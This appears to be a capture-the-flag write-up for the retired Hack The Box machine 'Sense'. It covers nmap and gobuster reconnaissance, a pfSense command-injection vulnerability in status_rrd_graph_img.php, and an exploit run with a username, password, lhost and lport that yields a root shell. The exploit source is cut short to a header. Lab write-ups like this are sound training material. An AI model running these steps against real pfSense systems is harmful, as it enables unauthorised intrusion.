Name: Sense
Release Date: 21 Oct 2017
Retire Date: 24 Mar 2018
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
echthros 00 days, 05 hours, 53 mins, 47 seconds
echthros 00 days, 05 hours, 47 mins, 11 seconds
Creator: lkys37en
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Sense

$ nmap -sC -sV -Pn -p- -oA ./Sense
Starting Nmap 7.80 ( ) at 2020-07-16 09:09 EDT
Nmap scan report for
Host is up (0.026s latency).
Not shown: 65533 filtered ports
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 213.50 seconds

We start with HTTP and HTTPS.  As with all strictly web based boxes, run a gobuster on it using:


gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u -k -x php,txt


The -k flag bypasses the certificate validation error that you would get without it and -x is the extension flag to look for php and txt files.

$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u -k -x php,txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/07/16 09:27:22 Starting gobuster
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)   

Gobuster shows us there is a changelog.txt and a system-users.txt file that we can "snag".  Let's see what those say.  It might give us a glimpse into what is running and what version.

Let's see what vulns exist for that version.  There are a few, in particular a Command Injection one to status_rrd_graph_img.php. (5th from the bottom and using

Let's see what the exploit looks like.

#!/usr/bin/env python3

# Exploit Title: pfSense 

Looks simple enough.  It asks for the remote host, local host, local port, username, and password.  We have all those things. 


python3 --rhost --lhost --lport 9999 --username rohit --password pfsense


And here....we....GO

Awesome.  Now who am I on as?  Surprise! Instant 1 step Root Shell. I love them when they're easy.